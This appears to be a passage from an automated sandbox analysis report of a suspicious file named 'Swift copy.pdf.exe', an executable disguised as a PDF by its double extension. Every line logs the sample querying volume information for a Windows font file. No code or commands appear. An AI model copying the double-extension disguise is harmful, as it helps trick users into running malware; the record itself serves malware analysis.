          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
